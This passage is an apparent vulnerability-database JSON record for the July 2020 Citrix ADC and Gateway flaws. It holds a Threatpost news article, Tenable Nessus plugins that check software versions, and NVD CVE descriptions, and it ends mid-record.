{"id": "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "hash": "15281cff89d9f8dfec5ec8ade1d19220", "type": "threatpost", "bulletinFamily": "info", "title": "Citrix Bugs Allow Unauthenticated Code Injection, Data Theft", "description": "Multiple vulnerabilities in the Citrix Application Delivery Controller (ADC) and Gateway would allow code injection, information disclosure and denial of service, the networking vendor announced Tuesday. Four of the bugs are exploitable by an unauthenticated, remote attacker.\n\nThe Citrix products (formerly known as NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to a December assessment from Positive Technologies.\n\nOther flaws announced Tuesday also affect Citrix SD-WAN WANOP appliances, models 4000-WO, 4100-WO, 5000-WO and 5100-WO.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAttacks on the management interface of the products could result in system compromise by an unauthenticated user on the management network; or system compromise through cross-site scripting (XSS). Attackers could also create a download link for the device which, if downloaded and then executed by an unauthenticated user on the management network, could result in the compromise of a local computer.\n\n\u201cCustomers who have configured their systems in accordance with [Citrix recommendations](<https://docs.citrix.com/en-us/citrix-adc/citrix-adc-secure-deployment/secure-deployment-guide.html>) [i.e., to have this interface separated from the network and protected by a firewall] have significantly reduced their risk from attacks to the management interface,\u201d according to the vendor.\n\nThreat actors could also mount attacks on Virtual IPs (VIPs). VIPs, among other things, are used to provide users with a unique IP address for communicating with network resources for applications that do not allow multiple connections or users from the same IP address.\n\nThe VIP attacks include denial of service against either the Gateway or Authentication virtual servers by an unauthenticated user; or remote port scanning of the internal network by an authenticated Citrix Gateway user.\n\n\u201cAttackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\u201d according to the critical [Citrix advisory](<https://support.citrix.com/article/CTX276688>). \u201cCustomers who have not enabled either the Gateway or Authentication virtual servers are not at risk from attacks that are applicable to those servers. Other virtual servers e.g. load balancing and content switching virtual servers are not affected by these issues.\u201d\n\nA final vulnerability has been found in Citrix Gateway Plug-in for Linux that would allow a local logged-on user of a Linux system with that plug-in installed to elevate their privileges to an administrator account on that computer, the company said.\n\nOf the 11 vulnerabilities, there are six possible attacks routes; but five of those have barriers to exploitation. Also, the latest patches fully resolve all the issues. Here\u2019s a full list of the bugs with exploitation barriers listed:\n\n\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, a compromise could easily be used as a foothold to move laterally across a victim organization. However, Citrix CISO Fermin Serna said in an accompanying [blog post](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that the company isn\u2019t aware of any active exploitation of the issues so far, and he stressed that the barriers to exploitation of these flaws are significant.\n\n\u201cThere are barriers to many of these attacks; in particular, for customers where there is no untrustworthy traffic on the management network, the remaining risk reduces to a denial-of-service attack,\u201d he wrote. \u201cAnd in that case, only when Gateway or authentication virtual servers are being used. Other virtual servers, for example, load balancing and content switching virtual servers, are not affected by the issue.\u201d\n\nHe added, \u201cthree possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\u201d\n\nSerna also noted that the bugs aren\u2019t related to the CVE-2019-19781 critical bug in Citrix ADC and Gateway, [announced in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>). That zero-day flaw [remained unpatched](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) for almost a month and in-the-wild attacks [followed](<https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/>).\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "published": "2020-07-07T14:44:30", "modified": "2020-07-07T14:44:30", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/", "reporter": "Tara Seals", "references": ["https://threatpost.com/newsletter-sign/", "https://docs.citrix.com/en-us/citrix-adc/citrix-adc-secure-deployment/secure-deployment-guide.html", "https://support.citrix.com/article/CTX276688", "https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/", "https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/", "https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/", "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "https://attendee.gotowebinar.com/register/441045308082589963?source=art", "https://attendee.gotowebinar.com/register/441045308082589963?source=art"], "cvelist": ["CVE-2019-19781", "CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "lastseen": "2020-07-07T14:49:14", "history": [], "viewCount": 84, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["CITRIX_NETSCALER_CTX276688.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL"]}, {"type": "cve", "idList": ["CVE-2020-8199", "CVE-2020-8190", "CVE-2020-8198", "CVE-2020-8197", "CVE-2020-8191", "CVE-2020-8196", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8187", "CVE-2020-8195"]}, {"type": "attackerkb", "idList": ["AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "thn", "idList": ["THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:166AAAF7F04EF01C9E049500387BD1FD"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A"]}, {"type": "threatpost", "idList": ["THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9688E067E5F287042D4EBC46107C66AF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155905", "PACKETSTORM:155947", "PACKETSTORM:155930", "PACKETSTORM:155904", "PACKETSTORM:155972"]}, {"type": "exploitdb", "idList": ["EDB-ID:47901", "EDB-ID:47930"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33824", "1337DAY-ID-33794", "1337DAY-ID-33806"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "cert", "idList": ["VU:619785"]}, {"type": "mssecure", "idList": ["MSSECURE:E3C8B97294453D962741782EC959E79C"]}], "modified": "2020-07-07T14:49:14", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2020-07-07T14:49:14", "rev": 2}, "vulnersScore": 6.1}, "objectVersion": "1.4", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"]}

{"nessus": [{"lastseen": "2020-07-15T09:18:18", "bulletinFamily": "scanner", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is version 10.5.x prior to 10.5.70.18, 11.1.x prior to \n11.1.64.14, 12.0.x prior to 12.0.63.21, 12.1.x prior to 12.1.57.18 or 13.0.x prior to 13.0.58.30. It is, therefore, \naffected by multiple vulnerabilities:\n\n - An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices. An \n unauthenticated remote attacker with access to the NSIP/management interface can exploit this to bypass \n authorization. (CVE-2020-8193)\n\n - A code injection vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated \n remote attacker with access to the NSIP/management interface can exploit this to create a malicious file\n which, if executed by a victim on the management network, could allow the attacker arbitrary code execution\n in the context of that user. (CVE-2020-8194)\n\n - A cross-site scripting vulnerability exists in Citrix ADC and NetScaler Gateway devices. An\n unauthenticated remote attacker can exploit this convincing a user to click a specially crafted URL, to \n execute arbitrary script code in a user", "modified": "2020-07-08T00:00:00", "id": "CITRIX_NETSCALER_CTX276688.NASL", "href": "https://www.tenable.com/plugins/nessus/138212", "published": "2020-07-08T00:00:00", "title": "Citrix ADC and Citrix NetScaler Gateway Multiple Vulnerabilities (CTX276688)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138212);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/14\");\n\n script_cve_id(\n \"CVE-2019-18177\",\n \"CVE-2020-8187\",\n \"CVE-2020-8190\",\n \"CVE-2020-8191\",\n \"CVE-2020-8193\",\n \"CVE-2020-8194\",\n \"CVE-2020-8195\",\n \"CVE-2020-8196\",\n \"CVE-2020-8197\",\n \"CVE-2020-8198\",\n \"CVE-2020-8199\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0286\");\n\n script_name(english:\"Citrix ADC and Citrix NetScaler Gateway Multiple Vulnerabilities (CTX276688)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix ADC or Citrix NetScaler Gateway device is version 10.5.x prior to 10.5.70.18, 11.1.x prior to \n11.1.64.14, 12.0.x prior to 12.0.63.21, 12.1.x prior to 12.1.57.18 or 13.0.x prior to 13.0.58.30. It is, therefore, \naffected by multiple vulnerabilities:\n\n - An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices. An \n unauthenticated remote attacker with access to the NSIP/management interface can exploit this to bypass \n authorization. (CVE-2020-8193)\n\n - A code injection vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated \n remote attacker with access to the NSIP/management interface can exploit this to create a malicious file\n which, if executed by a victim on the management network, could allow the attacker arbitrary code execution\n in the context of that user. (CVE-2020-8194)\n\n - A cross-site scripting vulnerability exists in Citrix ADC and NetScaler Gateway devices. An\n unauthenticated remote attacker can exploit this convincing a user to click a specially crafted URL, to \n execute arbitrary script code in a user's browser session. (CVE-2020-8191, CVE-2020-8198)\n\nIn addition, Citrix ADC and Citrix NetScaler Gateway are also affected by several additional vulnerabilities including \nconfiguration-dependent privilege escalations, information disclosures, and a denial of service vulnerability. \n\nPlease refer to advisory CTX276688 for more information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX276688\");\n script_set_attribute(attribute:\"solution\", value:\n\"For versions 10.5.x, 11.1.x, 12.0.x, 12.1.x and 13.0.x, upgrade to 10.5.70.18, 11.1.64.14, 12.0.63.21, 12.1.57.18 and \n13.0.58.30, or later, respectively.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8197\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:citrix:netscaler_gateway\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:citrix:netscaler_application_delivery_controller\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_netscaler_detect.nbin\");\n script_require_keys(\"Host/NetScaler/Detected\");\n\n exit(0);\n}\n\ninclude('audit.inc');\n\nversion = get_kb_item_or_exit('Host/NetScaler/Version');\nbuild = get_kb_item('Host/NetScaler/Build');\n\ndisplay_version = version + '-' + build;\nversion = version + '.' + build;\n\nfixed_build = NULL;\n\nif (version =~ '^10\\\\.5' && ver_compare(ver:build, fix:'70.18', strict:FALSE) == -1)\n fixed_build = '10.5-70.18';\n\nif (version =~ '^11\\\\.1' && ver_compare(ver:build, fix:'64.14', strict:FALSE) == -1)\n fixed_build = '11.1-64.14';\n\nif (version =~ '^12\\\\.0' && ver_compare(ver:build, fix:'63.21', strict:FALSE) == -1)\n fixed_build = '12.0-63.21';\n\nif (version =~ '^12\\\\.1' && ver_compare(ver:build, fix:'57.18', strict:FALSE) == -1)\n fixed_build = '12.1-57.18';\n\nif (version =~ '^13\\\\.0' && ver_compare(ver:build, fix:'58.30', strict:FALSE) == -1)\n fixed_build = '13.0-58.30';\n\nif (isnull(fixed_build))\n audit(AUDIT_INST_VER_NOT_VULN, 'Citrix NetScaler', display_version);\n\nreport =\n '\\n Installed version : ' + display_version +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-08-01T02:14:38", "bulletinFamily": "scanner", "description": "Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for\nuntrusted template files to cause reads/writes outside of the template\ndirectories. This vulnerability is a component of the recent Citrix\nexploit.", "modified": "2020-08-02T00:00:00", "id": "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "href": "https://www.tenable.com/plugins/nessus/132879", "published": "2020-01-15T00:00:00", "title": "FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132879);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/01/17\");\n\n script_cve_id(\"CVE-2019-19781\");\n\n script_name(english:\"FreeBSD : Template::Toolkit -- Directory traversal on write (2bab995f-36d4-11ea-9dad-002590acae31)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Art Manion and Will Dormann report :\n\nBy using an older and less-secure form of open(), it is possible for\nuntrusted template files to cause reads/writes outside of the template\ndirectories. This vulnerability is a component of the recent Citrix\nexploit.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kb.cert.org/vuls/id/619785/\"\n );\n # https://vuxml.freebsd.org/freebsd/2bab995f-36d4-11ea-9dad-002590acae31.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e74959bf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:p5-Template-Toolkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"p5-Template-Toolkit<3.004\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-11T01:06:28", "bulletinFamily": "scanner", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on \nan affected host.\n\nPlease refer to advisory CTX267027 for more information.", "modified": "2019-12-24T00:00:00", "id": "CITRIX_NETSCALER_CTX267027.NASL", "href": "https://www.tenable.com/plugins/nessus/132397", "published": "2019-12-24T00:00:00", "title": "Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132397);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/10\");\n\n script_cve_id(\"CVE-2019-19781\");\n script_xref(name:\"IAVA\", value:\"2020-A-0001-S\");\n\n script_name(english:\"Citrix ADC and Citrix NetScaler Gateway Arbitrary Code Execution (CTX267027)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"\n The remote device is affected by an arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix ADC or Citrix NetScaler Gateway device is affected by an arbitrary code execution vulnerability.\nAn unauthenticated, remote attacker may be able to leverage this vulnerability to perform arbitrary code execution on \nan affected host.\n\nPlease refer to advisory CTX267027 for more information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX267027\");\n script_set_attribute(attribute:\"solution\", value:\n\"For versions 10.5.x, 11.1.x, 12.0.x, 12.1.x and 13.0.x, upgrade to 10.5.70.12, 11.1.63.15, 12.0.63.13, 12.1.55.18 and \n13.0.47.24 respectively.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Citrix ADC (NetScaler) Directory Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:citrix:netscaler_access_gateway_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_netscaler_detect.nbin\");\n script_require_keys(\"Host/NetScaler/Detected\");\n\n exit(0);\n}\n\ninclude('audit.inc');\n\nversion = get_kb_item_or_exit('Host/NetScaler/Version');\nbuild = get_kb_item('Host/NetScaler/Build');\n\ndisplay_version = version + '-' + build;\nversion = version + '.' + build;\n\nfixed_build = NULL;\n\nif (version =~ '^10\\\\.5' && ver_compare(ver:build, fix:'70.12', strict:FALSE) == -1)\n fixed_build = '10.5-70.12';\n\nif (version =~ '^11\\\\.1' && ver_compare(ver:build, fix:'63.15', strict:FALSE) == -1)\n fixed_build = '11.1-63.15';\n\nif (version =~ '^12\\\\.0' && ver_compare(ver:build, fix:'63.13', strict:FALSE) == -1)\n fixed_build = '12.0-63.13';\n\nif (version =~ '^12\\\\.1' && ver_compare(ver:build, fix:'55.18', strict:FALSE) == -1)\n fixed_build = '12.1-55.18';\n\nif (version =~ '^13\\\\.0' && ver_compare(ver:build, fix:'47.24', strict:FALSE) == -1)\n fixed_build = '13.0-47.24';\n\nif (isnull(fixed_build))\n audit(AUDIT_INST_VER_NOT_VULN, 'Citrix NetScaler', display_version);\n\nreport =\n '\\n Installed version : ' + display_version +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-07-15T10:35:32", "bulletinFamily": "NVD", "description": "Incorrect file permissions in Citrix ADC and Citrix Gateway before versions 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 allows privilege escalation.", "modified": "2020-07-13T20:51:00", "id": "CVE-2020-8190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8190", "published": "2020-07-10T16:15:00", "title": "CVE-2020-8190", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-07-15T10:35:32", "bulletinFamily": "NVD", "description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.", "modified": "2020-07-13T20:50:00", "id": "CVE-2020-8196", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8196", "published": "2020-07-10T16:15:00", "title": "CVE-2020-8196", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2020-07-15T10:35:32", "bulletinFamily": "NVD", "description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.", "modified": "2020-07-13T20:37:00", "id": "CVE-2020-8193", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8193", "published": "2020-07-10T16:15:00", "title": "CVE-2020-8193", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-07-15T10:35:32", "bulletinFamily": "NVD", "description": "Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS).", "modified": "2020-07-13T20:40:00", "id": "CVE-2020-8191", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8191", "published": "2020-07-10T16:15:00", "title": "CVE-2020-8191", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-07-15T10:35:32", "bulletinFamily": "NVD", "description": "Privilege escalation vulnerability on Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 allows a low privileged user with management access to execute arbitrary commands.", "modified": "2020-07-13T20:40:00", "id": "CVE-2020-8197", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8197", "published": "2020-07-10T16:15:00", "title": "CVE-2020-8197", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-07-15T10:35:32", "bulletinFamily": "NVD", "description": "Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.", "modified": "2020-07-13T20:50:00", "id": "CVE-2020-8195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8195", "published": "2020-07-10T16:15:00", "title": "CVE-2020-8195", "type": "cve", "cvss": {"score": 4.0, "vector": 